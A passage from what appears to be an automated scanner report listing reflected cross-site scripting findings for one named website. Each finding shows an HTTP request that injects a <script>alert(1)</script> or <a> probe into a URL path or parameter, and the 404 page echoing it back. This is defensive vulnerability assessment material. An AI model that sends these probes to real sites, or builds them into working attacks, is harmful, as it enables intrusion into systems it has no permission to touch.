Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/imagesace84<script>alert(1)</script>bb8b883514b/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1338. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f5880<script>alert(1)</script>89411777c29 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/ratingf5880<script>alert(1)</script>89411777c29/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/ratingf5880<script>alert(1)</script>89411777c29/5.gif was not found on this server.</p>
...[SNIP]...

2.1339. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 177dd<script>alert(1)</script>8941471b20b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/5.gif177dd<script>alert(1)</script>8941471b20b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/5.gif177dd<script>alert(1)</script>8941471b20b was not found on this server.</p>
...[SNIP]...

2.1340. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3ca40<script>alert(1)</script>f5aed47d309 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/5.gif?3ca40<script>alert(1)</script>f5aed47d309=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/5.gif?3ca40<script>alert(1)</script>f5aed47d309=1 was not found on this server.</p>
...[SNIP]...

2.1341. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bbb17<script>alert(1)</script>e47cdd1bed7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbbb17<script>alert(1)</script>e47cdd1bed7/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbbb17<script>alert(1)</script>e47cdd1bed7/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1342. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2611<script>alert(1)</script>4b71e87809c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16a2611<script>alert(1)</script>4b71e87809c/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16a2611<script>alert(1)</script>4b71e87809c/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1343. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ae4fc<script>alert(1)</script>b489a9ad5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themesae4fc<script>alert(1)</script>b489a9ad5/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themesae4fc<script>alert(1)</script>b489a9ad5/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1344. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45c01<script>alert(1)</script>2844fe3a9b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos45c01<script>alert(1)</script>2844fe3a9b5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos45c01<script>alert(1)</script>2844fe3a9b5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1345. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 78733<script>alert(1)</script>34052cc57c7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images78733<script>alert(1)</script>34052cc57c7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images78733<script>alert(1)</script>34052cc57c7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1346. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3e258<script>alert(1)</script>dc93010767d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating3e258<script>alert(1)</script>dc93010767d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating3e258<script>alert(1)</script>dc93010767d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1347. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 2e5d7<script>alert(1)</script>43ec5959f21 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/search.php2e5d7<script>alert(1)</script>43ec5959f21?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php2e5d7<script>alert(1)</script>43ec5959f21?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1348. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3598f<a>677d7a4acc8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3598f<a>677d7a4acc8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3598f<a>677d7a4acc8&opt=2 was not found on this server.</p>
...[SNIP]...

2.1349. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 564bb<a>1b392273eea was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...564bb<a>1b392273eea&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php?keyword=search...564bb<a>1b392273eea&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1350. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 50049<script>alert(1)</script>1b4937a7d80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&50049<script>alert(1)</script>1b4937a7d80=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&50049<script>alert(1)</script>1b4937a7d80=1 was not found on this server.</p>
...[SNIP]...

2.1351. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2a411<a>2a27b952062 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=22a411<a>2a27b952062 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=22a411<a>2a27b952062 was not found on this server.</p>
...[SNIP]...

2.1352. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4dece<script>alert(1)</script>4bf28aacbc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4dece<script>alert(1)</script>4bf28aacbc0/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4dece<script>alert(1)</script>4bf28aacbc0/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1353. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c841c<script>alert(1)</script>c8af6c5b133 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16c841c<script>alert(1)</script>c8af6c5b133/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16c841c<script>alert(1)</script>c8af6c5b133/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1354. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c294<script>alert(1)</script>06edc0d2f24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes2c294<script>alert(1)</script>06edc0d2f24/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes2c294<script>alert(1)</script>06edc0d2f24/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1355. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24fe5<script>alert(1)</script>6d46f3c6cb4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos24fe5<script>alert(1)</script>6d46f3c6cb4/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
